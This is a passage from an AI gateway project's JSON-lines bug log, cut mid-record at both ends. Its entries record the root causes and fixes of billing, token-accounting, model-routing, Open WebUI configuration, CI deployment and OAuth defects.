"pr-1588"]} +{"id": "BUG-2026-08-17-01", "date": "2026-08-17", "title": "Chat microphone transcribed with Open WebUI's bundled whisper base, so Bengali dictation returned romanized Latin and never reached the gateway", "error_message": "Bengali speech dictated into the chat composer returned romanized Latin text ('bhoi ki shambhat, ek dimu gta shambhat chutra...') and never Bengali script; forcing language=bn changed nothing", "root_cause": "Open WebUI's audio.stt.engine persisted as the empty string, upstream's 'use my own bundled Whisper' value, and no AUDIO_STT_* variable was ever set anywhere in the repo, so POST /api/v1/audio/transcriptions decoded in-container against WHISPER_MODEL=base instead of reaching edge-api. base cannot write Bengali at any clip length or language hint. Chat dictation was also unmetered and invisible to the model catalog as a side effect. The keys are Open WebUI persistent config, so a compose value alone would have been a silent no-op on an already-booted deployment (same trap as #722)", "fix": "Set AUDIO_STT_ENGINE, AUDIO_STT_OPENAI_API_BASE_URL, AUDIO_STT_OPENAI_API_KEY and AUDIO_STT_MODEL on the open-webui service and reconcile all four from the environment on every container start in owui-patches/hive_rag_env_config.py, with the same destination-without-credential refusal and secret masking as the RAG pair. No deployment-wide language: forcing bn turns English dictation into Bengali garbage, and whisper-large-v3 auto-detects Bengali correctly from about five seconds. Also stopped .env.example shipping PARAKEET_BASE_URL and FASTER_WHISPER_BASE_URL uncommented, since either one takes transcription away from the catalog route and hands it to a sidecar that only runs under the voice profile", "tags": ["open-webui", "stt", "voice", "bengali", "persistent-config", "metering", "demo-box"]} +{"id": "owui-surfaces-image-vs-compose-2026-08-17", "date": "2026-08-17", "title": "Removed Open WebUI surfaces were off in one compose file and on in the image", "error_message": "Notes, Calendar and Automations rendered in the user menu and sidebar, and Settings > Personalization in the settings dialog, on any run of the Hive Open WebUI image that did not repeat docker-compose.yml's ENABLE_* lines, including the repo's own before/after proof builds. Separately, POST /api/v1/notes/create returned 200 and created a note with notes.enable false.", "root_cause": "Two independent gaps with the same shape. First, the removal of a product surface was expressed only as environment variables in docker-compose.yml plus a persisted-config reconcile, so it reached exactly one deployment and nothing else; upstream's defaults for all of them are on, and PR CI never builds Dockerfile.open-webui, so image and compose could disagree indefinitely with no signal. Second, a feature flag was assumed to be a complete control without checking that the backend honours it: calendar.py, automations.py and memories.py check theirs on every route, notes.py checks its own on none of its 9, so the flag hid the navigation entry and left the API fully callable.", "fix": "Dockerfile.open-webui sets ENABLE_NOTES, ENABLE_CALENDAR, ENABLE_AUTOMATIONS, ENABLE_MEMORIES and ENABLE_VERSION_UPDATE_CHECK false as image ENV defaults, so the reduced product is a property of the image while compose keeps overriding it and the reconcile keeps reaching already-booted databases. Caddyfile.owui adds api/v*/notes to @blocked. scripts/test_owui_ui_surfaces.py gains _image_env() and asserts the image, the compose value and the reconcile entry together for every flag-backed surface, plus that a non-persisted flag is deliberately absent from the reconcile.", "tags": ["open-webui", "docker", "feature-flags", "caddy", "persisted-config", "dead-code", "ui"]} +{"id": "free-pool-tools-supported-underclaim", "date": "2026-08-30", "title": "The free pool declared tools_supported=false on capable members, so the gateway answered its own 400 to every structured-output request on hive-free", "error_message": "400 Model 'hive-free' does not support parameter: response_format", "root_cause": "20260824_02_free_pool_router.sql seeded all four route-free-pool members with tools_supported=false as a placeholder, because cross-provider parity had not been probed. Nobody probed it afterwards, so the placeholder became the catalog's answer. tools_supported gates response_format as well as tools and tool_choice (PR #206), so guardToolCapability called SelectRoute with RequireToolCapable, got ErrNoCapableRoute, and wrote a provider-blind 400 no provider had asked for. The rows also contradicted 20260612_01_seed_tools_supported.sql, which had already declared every openrouter and groq route tool-capable. A second, structural half: SelectRoute's tool filter admitted a group if ANY member was capable, while edge-api dispatches the shared litellm_model_name and never the route id, so a mixed group would pass the gate and then be answered by a member that could not serve the request.", "fix": "Made the pool capability-uniform under ONE litellm_model_name, per owner decision that hive-free cannot become two endpoints (issue #1563). Probed each member: both Groq slots pass live on qwen/qwen3.8-27b, Gemini is documented capable on Google's own OpenAI-compatibility page, and the OpenRouter member fails because PR #1554 repointed it to openrouter/free, which picks among the zero-priced catalog per request (of 20 such models only 10 support response_format, and five identical strict-schema probes conformed once). Pinning that member to a capable model was tried and abandoned: every zero-priced model claiming tools, response_format and structured_outputs was probed and none honoured a strict schema reliably, so OpenRouter's structured_outputs flag records a claim rather than an enforced constraint. Disabled that member, moved the pinned fallback_order to route-free-pool-groq, and set tools_supported true on the three remaining members. Changed SelectRoute's tool filter from ANY member capable to every live member of the dispatch group capable, matching the MAX-across-the-group rule the reasoning-reserve block already uses. Added TestFreePoolIsUniformlyToolCapable and TestRouteGroupsAgreeOnEveryCapability. Repointed both Groq slots from openai/gpt-oss-20b (TPD 200K) to qwen/qwen3.8-27b (TPD 2M) after verifying the id, allowance and capabilities live.", "tags": ["catalog", "routing", "capabilities", "free-pool", "litellm", "ci", "under-claim", "groq", "openrouter", "rate-limits"]} +{"id": "bug-1472-total-tokens-identity", "date": "2026-08-29", "title": "total_tokens did not equal prompt_tokens plus completion_tokens on any route whose upstream disagreed", "error_message": "AssertionError: expected 31 to be 5 (tests/usage/usage-accounting.test.ts, live integration run 33251802900): usage.total_tokens was 31 while prompt_tokens + completion_tokens was 5 on a hive-free request", "root_cause": "clampZeroCompletionUsage was the only code that ever recomputed total_tokens and it returned early whenever completion_tokens was non-zero, so an upstream total that disagreed with its own components was decoded and re-emitted untouched. Hive never computed the wrong number; it had no rule requiring a usage object to be self-consistent. The upstream shape is consistent with a thinking model counting reasoning tokens in its total but not in its visible completion count, the free pool holding a thinking-capable Gemini member. Two further gaps found in review: the session-chat and RAG relays hand raw frame bytes to a customer and were never corrected at all, and the first comment on the new function asserted that nothing anywhere prices total_tokens, which is false for the batch executor.", "fix": "Added EnforceUsageIdentity in apps/edge-api/internal/inference/usage_clamp.go, which classifies the upstream token-accounting convention from the wire shape and acts per convention: inside (prompt plus completion equals total, breakdown fits inside its component) is left alone; alongside (prompt plus completion plus reasoning equals total) has the total restated as the component sum, which is lossless because the remainder stays on the wire in reasoning_tokens; unexplained has the total restated when it disagrees with the components, and NOTHING rewritten when the total agrees while the breakdown does not fit, because no second field carries the remainder there and any figure written would be invented. reasoning_tokens is never rewritten on any path: an interim revision capped it at completion_tokens and was retracted after verification, because nothing in edge-api computes that field, it is decoded verbatim from the upstream, and on the alongside convention the cap replaced a measured 26 with a fabricated 1. Exported the function so the RAG synchronous half reuses it, and added EnforceUsageIdentityInFrame, which writes total_tokens and nothing else, for the two SSE relays that never build a typed usage object. No component is ever rewritten, because settlement prices the components and folding an unattributed remainder into completion_tokens would begin billing a previously unbilled class (D-055). Every discrepancy is logged with its full arithmetic and its decided convention, counted in hive_usage_identity_violations_total, summed in tokens in hive_usage_identity_unaccounted_tokens_total, and summed as unbilled reasoning in hive_usage_reasoning_tokens_unbilled_total, whose series are all created at registration so an empty query means a registration defect rather than zero violations. normalizeEmbeddings holds to the same rule, where the identity reduces to total_tokens equal to prompt_tokens.", "tags": ["billing", "usage", "openai-contract", "edge-api", "inference", "issue-1472"]} +{"id": "bug-mhold616-1a2f3c", "timestamp": "2026-08-16T12:10:00.000Z", "related_bugs": [], "occurrences": 1, "last_seen": "2026-08-16T12:10:00.000Z", "title": "Credit hold never lifted for the captured part, so every settled request was billed twice", "error_message": "Console showed available falling 36 credits for an 18-credit completion; reserved rose by exactly the charge and stayed flat while the account was idle", "root_cause": "finalizeLocked released remainingHeldCredits minus actualCredits and nothing ever lifted the captured remainder. GetBalance computes reserved as ABS(SUM(reservation_hold) + SUM(reservation_release)), so the captured credits stayed in the reserved bucket permanently while the usage_charge had already reduced posted, double counting the price of every settled request. The reaper could not recover them because it only scans holds still in a non-terminal state. Live: 1836 terminal reservations holding 144028 credits, one account with three quarters of its balance withheld.", "fix": "Release the whole outstanding hold at capture (heldCredits, not heldCredits minus actualCredits) and post the charge separately, so hold and release cancel for every terminal reservation. The reservation row keeps consumed plus released summing to reserved. Also flattened the charge idempotency key from charge- to charge and made a dedup that returns a differing amount fatal, so a retried settlement cannot double charge or silently diverge from the row.", "tags": ["billing", "ledger", "credit-reservation", "money-path", "issue-616", "D-034", "control-plane", "pr-reservation-capture-hold-leak"]} +{"date": "2026-08-29", "area": "control-plane/batchstore", "error_message": "Batch line settlement charged a flat 1 credit per token and billed on usage.total_tokens", "root_cause": "DefaultCreditPolicy.Credits read no alias pricing at all and preferred usage.TotalTokens when positive. hive-auto owns every supports_batch route and is pricing_mode upstream_actual with NULL price columns, so the only alias that can reach the live local-executor batch path was priced by a formula unrelated to its cost; and total_tokens is a superset of prompt plus completion on a thinking-capable route, so the charge included tokens the customer never received.", "fix": "priceLine branches on catalog.CatalogPricing: fixed aliases price prompt and completion independently at their per-million catalog rates with one round half up, upstream_actual aliases settle from the provider-reported cost times the 7/5 margin times 1e9 credits per USD. An unreadable cost fails closed to the alias reservation estimate, unconfirmed, never to zero and never to a token count. The alias price reaches the dispatcher on BatchSnapshot.Pricing from the SelectRoute call LoadBatch already made.", "tags": ["billing", "batch", "money-path", "total-tokens", "upstream-actual", "issue-1473"]} +{"id": "bug-2026-09-01-budget-hard-cap-never-blocked", "date": "2026-09-01", "title": "Budget hard cap never blocked: the month-to-date counter had no writer and the cap key expired 30s after it was saved", "error_message": "No request was ever refused with 402 budget_hard_cap_exceeded, on any workspace, at any spend level", "root_cause": "Two independent halves of one control were missing. Nothing in the repository ever wrote budget:mtd_spend:{ws}:YYYY-MM, which the edge-api gate reads and treats as zero when absent, so the comparison was always zero against the cap. Separately, budgets.SetBudget published budget:hard_cap:{ws} with a 30 second TTL under a comment claiming the gate would read through on a miss; the gate instead reads a missing cap as no budget configured, and nothing republished the key, so a saved cap stopped being enforced half a minute after the customer typed it. The gate's own tests seeded both keys themselves, which is why a gate with no writer reported green for months.", "fix": "Added budgets.MTDSpendCounter, called from accounting.finalizeLocked (the single settlement chokepoint), accumulating ledger credits with INCRBY and rewriting the gate's key in BDT subunits from the running total (per-charge conversion rounds every charge to zero). Published the cap with no expiry, and republished it from the ledger whenever the counter rebuilds a workspace's period keys. Wired the previously noop fail-open metric to a real Prometheus counter. Cross-module key literals pinned in tests on both sides, since neither internal tree can import the other.", "tags": ["billing", "budgets", "redis", "edge-api", "control-plane", "unit-conflation", "silent-failure", "issue-1651"]} +{"id": "BUG-2026-08-11-committed-e2e-credentials", "date": "2026-08-11", "title": "Live E2E credentials committed in plaintext in a public repo, and re-seeded onto the accounts on every run", "error_message": "No error. The suite passed, which is the problem: e2e-auth-defaults.json carried verifiedPassword, unverifiedPassword and invitationToken for two live tenant-OWNER accounts, and CI referenced E2E_VERIFIED_PASSWORD and E2E_UNVERIFIED_PASSWORD secrets that did not exist, so the empty string fell through to the committed values.", "root_cause": "envOrDefault treated an unset credential as a request for the committed fallback. A fallback makes the absence of a secret invisible, so nothing ever failed and the values stayed live for months while the seeder wrote them back onto the accounts through the admin API on every credential-less run. Two sibling scripts copied a related pattern, rotating hardcoded shared accounts unconditionally, one of them from a scheduled workflow whose concurrency group does not join a labelled-PR run to the scheduled run.", "fix": "Removed the three fields; both readers now use requiredSecretEnv, which throws and names the variable with no fallback and no skip. Set the two missing CI secrets. seed-owui-e2e-user.py takes password_to_set from seed-demo-owner.py and gains OWUI_E2E_RUN_KEY so the nightly provisions its own users instead of rotating shared ones; verify-rag-roundtrip.py takes RAG_VERIFY_PASSWORD and refuses to rotate. Both Playwright artifact uploads exclude traces and videos and retain for 5 days instead of 90. The fixture sweeper's three console.error calls now go through redactSecrets. docs/live-test-auth.md and README.md corrected. Review of the first push found the removal alone had made the shared-account hazard worse: the seeder still fell back to the two shared addresses without a run key, and ensureUser writes a password on both update paths, so each operator would now write a DIFFERENT value where the committed constant had at least been idempotent. runScopedEmail closes that by refusing an empty run key and namespacing every fixture address. Same round: index.html base64-inlines the report payload so excluding traces alone did not stop the leak, three container-log artifacts were missed, the shim-key delete still revoked concurrent runs until bounded by age, and the invitation token was a committed literal plus a public run id.", "tags": ["security", "credentials", "e2e", "ci", "public-repo", "gotrue", "artifacts"], "pr": 880, "issue": 879} +{"id": "bug-2026-08-29-agent-task-billing-attribution", "date": "2026-08-29", "title": "Agent tasks billed zero: the sandbox spent a Hive-owned key, so Hive paid for every tenant's agent inference", "error_message": "Three successful agent tasks on a funded account wrote a reservation_hold and a matching full reservation_release 14 to 20 ms later and no usage_charge at all; net cost of three sandbox runs was 0 credits, while ordinary chat on the same account in the same window charged normally.", "root_cause": "Two separate things, neither of them a broken ledger. The hold and release are edge-api's submit-time solvency probe (sessionbilling.Probe takes the hold and calls settle.Release in the same call), which is why the release lands milliseconds after the hold and about 18 seconds before started_at. The missing charge is an attribution gap: the host launcher holds one process-wide HIVE_AGENT_ENGINE_LLM_API_KEY, so every sandbox turn re-entered edge-api on the API-key path and settled correctly against the single Hive-owned account that key belongs to, never the tenant. Hive absorbed the provider cost rather than merely failing to collect. PR #1466 had named the gap and left it open.", "fix": "Control-plane mints a short-lived API key on the task's own tenant billing account (key id = task id, kind = agent_task so it is filtered out of the customer's key list structurally), sends it on the launch payload, and the launcher prefers it over the process-wide key for that session. Revoked by primary key on every terminal transition, with a 2 hour expiry as the backstop; a revocation that cannot find its credential is an ERROR with its own reason, never treated as already-revoked. A task whose credential cannot be minted fails and launches no sandbox. A credential revoked with last_used_at still NULL is logged with reason agent_task_credential_settled_nothing and is countable in api_keys.", "tags": ["billing", "money-path", "agent-tasks", "attribution", "fail-closed", "credentials", "issue-1507"]} +{"id": "bug-1326-stream-zero-content-billed", "date": "2026-08-29", "title": "A streamed request that delivered zero visible content settled at full catalog price, and the first fix for it was disabled by a normal client close", "error_message": "Well formed SSE stream, every frame a valid chat.completion.chunk, no frame carrying assistant visible text, finalized with actual_credits=18 and terminal_usage_confirmed=true", "root_cause": "settleStream judged delivery by a confirmed usage block, a forwarded frame or an upstream reported cost, none of which has anything to do with whether the customer could read anything. A reasoning burn produces all three and no text, so it settled as an ordinary full price success. The first fix then keyed its emptiness rule on reqCtx.Err() read inside the settlement defer, where r.Context() is cancelled by the client closing the tab, which is the normal ending of a blank stream, so the guard was suppressed in exactly the case it existed for; a Caddy reset or a WriteTimeout produced the same wrong charge, and a buffering proxy produced the opposite error of serving an abandonment free.", "fix": "Emptiness is decided by what the relay delivered and whether the upstream stream completed, never by the caller's socket state at settlement time: a new StreamCompleted accumulator field set at the DONE sentinel or a clean end of body, plus no visible text, no tool call, no refusal, and a finish_reason of length only. A completed empty stream is absorbed even if the client has gone; a stream cut off before its own end bills, including one aborted on bufio.ErrTooLong after the finish reason arrived. The absorbed cost is recorded as money in hive_stream_zero_content_absorbed_credits_total, whose two outcome series are created at registration so zero reads as zero and absent reads as broken, incremented after the release succeeds rather than before it is attempted, with a failed release counted under its own outcome. The customer's usage event carries a zero credit delta for an absorbed burn.", "tags": ["billing", "streaming", "edge-api", "reasoning-burn", "fail-closed", "metrics", "issue-1326"], "files": ["apps/edge-api/internal/inference/stream.go", "apps/edge-api/internal/inference/zero_content_guard.go", "apps/edge-api/internal/inference/stream_responses.go", "apps/edge-api/internal/inference/stage_metrics.go", "apps/edge-api/cmd/server/main.go"]} +{"id": "bug-2026-08-22-litellm-drops-streaming-cost", "date": "2026-08-22", "title": "LiteLLM v1.77.7-stable destroys OpenRouter's reported per-request cost on the streaming path", "error_message": "Streaming terminal usage chunk arrives with prompt/completion/total tokens only; usage.cost and usage.cost_details present in the upstream response are absent by the time the chunk reaches edge-api", "root_cause": "LiteLLM reconstructs the usage object from its own schema when relaying SSE rather than passing the provider's usage object through, so any key it does not declare is dropped. The sync path passes the same fields through untouched, which makes the gap easy to miss: a feature verified only on the non-streaming path looks correct and then bills wrong for every streamed request. Compounding trap: x-litellm-response-cost on that version returns LiteLLM's own static price-map guess (0.0105 against a real 0.0123456) rather than the provider figure, so the obvious fallback is a fabricated number on a money path.", "fix": "Measured the boundary empirically with a fake OpenRouter returning a known cost: broken on v1.77.7-stable and on v1.83.14-stable (the newest tagged stable), fixed on the immutable tag v1.98.0. Pin bump tracked separately. Settlement fails closed to the full hold flagged unconfirmed when no cost can be read, so the gap can never bill zero.", "tags": ["billing", "litellm", "openrouter", "streaming", "money-path", "free-serve", "silent-data-loss"]} +{"id": "bug-1567-task-path-upstream-auth", "date": "2026-08-30", "title": "Every /api/task/* background completion 401s because the task path never runs the credential-injecting Filter", "error_message": "open_webui.utils.middleware:chat_web_search_handler:1359 - Query generation failed; edge-api same second: WARN owui shim request missing upstream_auth metadata path=/v1/chat/completions rejected=true", "root_cause": "The per-user credential is injected by hive_jwt_forward.py, a native Open WebUI Functions Filter. Open WebUI runs that chain only from process_chat_payload, the main chat path. routers/tasks.py runs the legacy process_pipeline_inlet_filter instead and then calls utils/chat.py::generate_chat_completion directly, so all eight task handlers reached edge-api under the static shim key with no __metadata.upstream_auth, and OWUIUnwrap failed closed 401 because requiresPerUserAuth is unconditional on /v1/chat/completions. Deterministic, model independent, and unrelated to the hive-free 429 rate in #1564.", "fix": "Attach the same credential at the dispatch seam in utils/chat.py::generate_chat_completion, on the OpenAI arm only, via deploy/docker/owui-patches/hive_upstream_auth.py plus apply_task_upstream_auth_patch.py. Idempotent when the chat Filter already injected one, fail closed when no OAuth session resolves. edge-api and requiresPerUserAuth are untouched: the fix supplies the credential rather than widening who may go without one.", "tags": ["owui", "auth", "tasks", "web-search", "rag", "edge-api", "owui-patches", "issue-1567"], "issue": 1567} +{"id": "bug-2026-08-25-deploy-dump-step-cannot-fire", "date": "2026-08-25", "title": "deploy-demo-box's only diagnostic step sat mid-job, so seven later steps failed with no evidence", "error_message": "attempt 12 failed (api=0, control-plane=1, chat=1), retry in 10s / SMOKE FAIL", "root_cause": "The 'Dump container status + logs on failure' step was step 11 of 18 in the deploy job. `if: failure()` runs a step wherever it sits, but it can only report on what already happened, so a failure in any of the seven steps after it (smoke test, both LiteLLM reconcile steps, the price assertion, the OAuth scope check) produced no compose ps, no container logs and no disk figures.", "fix": "Moved the dump to the last position in the deploy job, added df -h and docker system df, and switched compose ps to ps -a so exited containers are visible. tools/lint-deploy-diagnosability.mjs asserts the position in the repo-policy-lints required check.", "tags": ["ci", "deploy", "observability", "github-actions", "demo-box"]} +{"id": "bug-2026-08-25-compose-up-builds-without-recreating", "date": "2026-08-25", "title": "docker compose up -d --build rebuilt seven images, recreated zero containers, and exited 0", "error_message": "Image hive-edge-api:ci Built / Container hive-edge-api-1 Running", "root_cause": "On the demo box `up -d --build` rebuilds every service image to a new ID and then leaves every container running on the previous image, reporting success. Confirmed on dispatch run 32845200901: seven images Built, every container Running, none Recreated. The box had therefore received no code since 03:05 UTC despite the recreate step passing, and the log shape of a genuine cached no-op is identical to it (issue #1103).", "fix": "Added a step immediately after the recreate that compares every running container's created-from image ID against the ID its image reference resolves to now, recreates exactly the drifted services with --force-recreate --no-deps --wait, and re-runs the comparison, failing if the drift survives. It also fails when the box's checkout does not contain the run's commit.", "tags": ["ci", "deploy", "docker-compose", "silent-failure", "demo-box"]} +{"id": "bug-2026-08-25-smoke-test-discards-status-code", "date": "2026-08-25", "title": "The deploy smoke test discarded HTTP status codes, so a stale edge-api read exactly like a dead tunnel", "error_message": "attempt 1 failed (api=0, control-plane=1, chat=1), retry in 10s", "root_cause": "The smoke test decided its verdict with `curl -fsS && ok=1`, which keeps no status code, no body and no curl exit code. edge-api answers 503 {\"status\":\"degraded\"} whenever it cannot reach control-plane, and under -f that is the same signal as an unreachable host or a broken Cloudflare Tunnel ingress. The actual cause on 2026-08-25 was edge-api running a stale image; the same probe returned SMOKE OK once it was recreated.", "fix": "Each probe now records status and body via curl -w '%{http_code}'; on failure the step prints the last response from each hostname plus the same probe over loopback (localhost:8080, localhost:8081), which separates a tunnel ingress fault from a service fault. Pass bar kept at 2xx/3xx to preserve curl -f semantics.", "tags": ["ci", "deploy", "observability", "demo-box", "edge-api"]} +{"date": "2026-08-31", "title": "Focus ring token declared once on :root with no dark value, so it failed WCAG in light and nothing caught it", "error_message": "--hv-focus-ring: oklch(0.678 0.164 43) measures 2.67:1 on the cream canvas against the 3:1 a non text indicator needs; 131 outline-none sites in the chat surface and 576 tree wide meant most controls showed no ring at all in either theme", "root_cause": "The token was a literal on bare :root and was never overridden in either dark block, so one value had to serve both themes and could only be correct in one. The token file's own comment already recorded that coral reads 2.67:1 on cream and 5.34:1 on charcoal and so works as a ground in both and as text in neither. The two ring pattern in hive.css was designed to keep the indicator visible on the coral itself, and nobody checked the outer ring against the cream page it actually sits on.", "fix": "Introduced --hv-accent-strong with a light value measuring 4.50:1 on the canvas, declared on bare :root and overridden back to plain coral in both dark blocks, and made --hv-focus-ring derive from it through var() so a missing dark value is not expressible. Added one unlayered :is(...):focus-visible rule in hive.css at specificity (0,2,0), above the component rules, which covers all 576 outline-none sites because an unlayered declaration outranks the @layer utilities the utility lives in.", "tags": ["css", "accessibility", "wcag", "design-tokens", "chat", "theming", "issue-1521", "issue-1597"]} +{"id": "BUG-1510", "date": "2026-08-29", "title": "agent-engine host launcher ran unsupervised under a transient systemd-run unit, and the supervised replacement could not be deployed onto by older checkouts", "error_message": "systemctl --user show hive-agent-engine.service -> UnitFileState=transient, Restart=on-failure, CollectMode=inactive-or-failed, StartLimitBurst=5 over 10s; and later: Failed to start transient service unit: Unit hive-agent-engine.service was already loaded or has a fragment file", "root_cause": "scripts/install-agent-engine-host.sh started the launcher with systemd-run --user --collect. A transient unit lives in tmpfs so a reboot erases it, CollectMode deletes it when it stops, Restart=on-failure never covers a clean exit or SIGTERM, and the default start limit gives up after five attempts in ten seconds. Replacing it with a persistent unit file then created a second, sharper defect: systemd-run refuses a name a fragment file holds and systemctl stop does not unload a fragment, so any checkout predating the unit file failed at the launcher step, and because that step stops before it starts, each failure left the launcher dark and both agent capabilities down.", "fix": "Render an enabled user unit from deploy/systemd-user/ with Restart=always and StartLimitIntervalSec=0, fold it into PR #1456's installed-artifact fingerprint so unchanged deploys still skip the restart that kills in-flight Cowork sessions, and run scripts/normalize-agent-engine-unit.sh before the installer to hand the unit name back when the checkout cannot manage a unit file. Make /health answer for the ability to launch (apptainer on PATH, SIF present and carrying the SIF magic, packs dir, writable state dirs) so a deleted or truncated image is observable, and add -f to the installer's health checks so a 503 is a failure. Move the staleness check into a --check mode run from cron, a different scheduler, since a staleness check inside the timed probe cannot fire when the timer stops. Replace the printed is-enabled with a hard assertion.", "tags": ["systemd", "agent-engine", "demo-box", "supervision", "monitoring", "deploy", "issue-1510"]} +{"id": "755-audit-sink-toggles-inert", "date": "2026-08-29", "title": "Console audit sink toggles wrote tenant_settings that nothing read", "error_message": "Operator enables an audit sink in the console, the row persists to public.tenant_settings, and no audit event is ever exported: the sink set is decided once at process start from ENABLE_AUDIT_SINK_* environment variables and no code path reads the stored setting", "root_cause": "Two independent control surfaces for one decision. supabase/migrations/20260715_04_featuregate_dynamic_keys.sql registered six ENABLE_AUDIT_SINK_* rows under category audit_sink, which settings.Resolver.Registry renders in the console and settings.Resolver.Set writes, while apps/control-plane/cmd/server/main.go built the sink list from os.Getenv alone. Nothing ever joined the two. Three further layers of the same defect were found while fixing it: the audit_sink category was not in featuregate.platformManagedCategories, so a workspace OWNER could have suppressed the operator's own audit export had the read been wired; .env.example documented the sink credentials but none of the six enable flags; and deploy/docker/docker-compose.yml forwarded no audit sink variable at all to control-plane, so even the documented credentials reached no process on any compose deployment", "fix": "Retired the six gate rows rather than wiring the read (issue #755 outcome B), because a tenant-scoped switch over an operator-owned audit export is an audit-evasion control and because tenant_settings is the wrong scope for a process-global sink set. Migration 20260829_03 deletes the stored rows then the registry rows; deleting the registry row is the whole removal, since Registry backs rendering and Set refuses an unregistered key with a 400. Moved the environment path into internal/auditworker/sinkconfig so a database-backed compliance test can call the same constructor production calls, and proved both directions against a real HTTP receiver. Documented the six flags in .env.example and forwarded seventeen of the eighteen documented variables to control-plane in compose, holding back LANGFUSE_INCLUDE_CONTENT deliberately so turning prompt and completion export on takes a reviewed compose edit rather than a line in an operator .env", "tags": ["compliance", "audit", "feature-gates", "egress", "console", "tenant-settings", "issue-755", "silent-failure"], "files": ["apps/control-plane/cmd/server/main.go", "apps/control-plane/internal/auditworker/sinkconfig/sinkconfig.go", "apps/control-plane/internal/tenant/settings/keys.go", "apps/web-console/components/feature-gates/feature-gate-manager.tsx", "supabase/migrations/20260829_03_retire_audit_sink_feature_gates.sql", "deploy/docker/docker-compose.yml", ".env.example"]} +{"id": "catalog-price-guard-presence-not-position-2026-08-22", "date": "2026-08-22", "title": "Money-path pricing guards asserted digits appeared in the file, not that a value sat in its own alias row", "error_message": "Mutations survived: repricing hive-default to hive-medium's 21000/84000, and swapping input and output inside the deepseek-v4-flash tuple, both left the full suite green", "root_cause": "TestDerivedCreditsAppearInTheMigrationBody searched for each credit figure anywhere in the migration SQL with a word-boundary regex. Two pairs of aliases share prices by design, so another alias's tuple satisfied the search. Nothing bound a figure to its own alias or to the column it belonged in, and the repriced aliases were UPDATEd rather than INSERTed so they fell outside every guard keyed on the INSERT block. A third variant let a route be repointed at a costlier upstream model because provider_model was validated against the rate snapshot but never against the SQL.", "fix": "Added a quote-aware SQL reader (sqlparse_test.go, with its own self-test) that parses INSERT tuples and UPDATE assignments into column-keyed rows. Every assertion is now positional: the DERIVE figure is compared against that column of that alias's row, across both INSERTs and reprice UPDATEs, and each DERIVE route is checked against the provider_routes tuple for provider_model and provider. Structural regexes now run on comment-stripped SQL so the migration's own prose cannot satisfy or trip them. All three mutations re-run and observed red.", "tags": ["money-path", "testing", "mutation-testing", "false-green", "pricing", "migrations"]} +{"id": "catalog-sole-capability-carrier-disabled-2026-08-22", "date": "2026-08-22", "title": "Disabling one route silently removed three customer-facing endpoints catalog-wide", "error_message": "After disabling route-openrouter-auto, no row in provider_capabilities had supports_batch, supports_image_generation or supports_image_edit true, so SelectRoute returned ErrRouteNotEligible for /v1/batches, /v1/images/generations and /v1/images/edits for every alias", "root_cause": "20260414_01 granted those three flags to route-openrouter-auto and to no other route, and nothing since had granted them. A catalog restructure retired that route as part of a provider move, treating it as a per-alias change, when it was the sole carrier of three capabilities used by other aliases. matchesRequestedCapabilities hard-filters on each flag and the submitter sends NeedBatch for every batch, so the failure was total and silent: it fails closed, producing a gateway refusal rather than an error anything reports.", "fix": "Carried all three flags onto the replacement route-groq-auto, with supports_batch a true claim via the local batch executor and the two image flags documented as status-quo preservation of an over-claim that predated the change. Added TestDisablingASoleCapabilityCarrierHandsItsFlagsOn, which fails when a migration disables the sole carrier of one of these flags without granting it to a replacement, checking the column position rather than the column name so an all-false row cannot satisfy it.", "tags": ["migrations", "capabilities", "routing", "silent-failure", "fails-closed"]} +{"id": "owui-oauth-session-destroyed-at-first-refresh", "date": "2026-08-22", "error_message": "Every chat completion failed about 55 minutes after sign-in and kept failing until the user signed in again through SSO", "root_cause": "Two independent defects. OAUTH_SCOPES omitted offline_access so Supabase issued no refresh token and _perform_token_refresh returned None on its first guard, and the caller then deleted the OAuth session outright. Separately, Open WebUI hand-builds the refresh POST with the client credentials in the form body, which is client_secret_post, while the authorization code exchange goes through authlib with client_secret_basic, and every client this project registers is client_secret_basic, so a refresh token that did exist would have been refused anyway", "fix": "Added offline_access to OAUTH_SCOPES, and spliced a helper into both _perform_token_refresh implementations that authenticates the client with the method the client is registered with, rather than pinning OAUTH_TOKEN_ENDPOINT_AUTH_METHOD and forcing every client to be re-registered", "tags": ["owui", "oauth", "token-refresh", "session", "supabase", "issue-782"]} +{"id": "BUG-2026-08-21-01", "date": "2026-08-21", "title": "deploy-demo-box migrated Supabase Cloud while the box ran self-hosted, and reported success", "error_message": "psql: error: could not translate host name \"supabase-db\" to address: Name has no usable address (deploy job); migrate job green while applying nothing to the live database", "root_cause": "Two host-side assumptions survived the self-hosted Supabase cutover. The deploy job's price assertion ran psql in a container on the default bridge network, where the data plane's compose-network hostname does not resolve. The migrate job ran on a GitHub-hosted runner against an independent SUPABASE_DB_* secret set, which still named a reachable Supabase Cloud project, so it applied migrations there and reported success while the database the application reads received nothing. Neither job had any way to notice which database it was talking to.", "fix": "Added scripts/stack-psql.sh as the single way a command on the box reaches the stack's database, a throwaway psql container on the compose network with the repo bind-mounted at its own path. Routed the price assertion and both migration scripts through it via PSQL_BIN. Moved the migrate job onto the self-hosted runner, derived its connection from the same SUPABASE_DB_URL the stack uses via a new derive-pooler-dsn.py --emit-libpq-env, and added an identity assertion comparing pg_control_system().system_identifier against the running supabase-db container before anything is applied. Five structural guards in test_selfhost_supabase_seam.py keep the wiring from regressing.", "tags": ["ci", "deploy", "supabase", "selfhost", "silent-failure", "migrations", "docker-network"]} +{"date": "2026-08-31", "title": "Chat surface sent no system prompt at all", "error_message": "A real chat turn reached the model with an empty system message; the model then disclosed its provider by name and offered Notes, Calendar and Automations, three surfaces this deployment turns off", "root_cause": "Open WebUI's only system-prompt inputs are params.system on a row of its own models table and the per-user Settings > General field. Hive's model list is synthesized by owui-patches/hive_model_picker.py from the control-plane catalog, which has no system-prompt column and leaves no durable Open WebUI row, so neither input was reachable for a Hive model and no global default exists upstream", "fix": "New Hive-owned hive.chat.system_prompt key on the existing hive_rag_env_config reconcile rail, plus owui-patches/apply_chat_system_prompt_patch.py, which prepends the row to the request's system message inside process_chat_payload, above the metadata['system_prompt'] snapshot the native tool-call loop restores and below the Chat Controls branch so the user's own text is appended rather than replacing it", "tags": ["owui", "prompts", "chat", "owui-patch", "issue-1596", "shipping-path"]} +{"id": "bug-2026-08-30-owui-env-vars-silently-inert-unmapped", "date": "2026-08-30", "title": "Environment variables absent from the chat container's reconcile map were silently inert, including a same-night security bound", "error_message": "WEB_LOADER_TIMEOUT=12 present in the container environment; effective config row web.loader.timeout stayed \"\" (23 days stale); if WEB_LOADER_TIMEOUT: in retrieval/web/utils.py treats an empty string as no bound at all", "root_cause": "Open WebUI persists 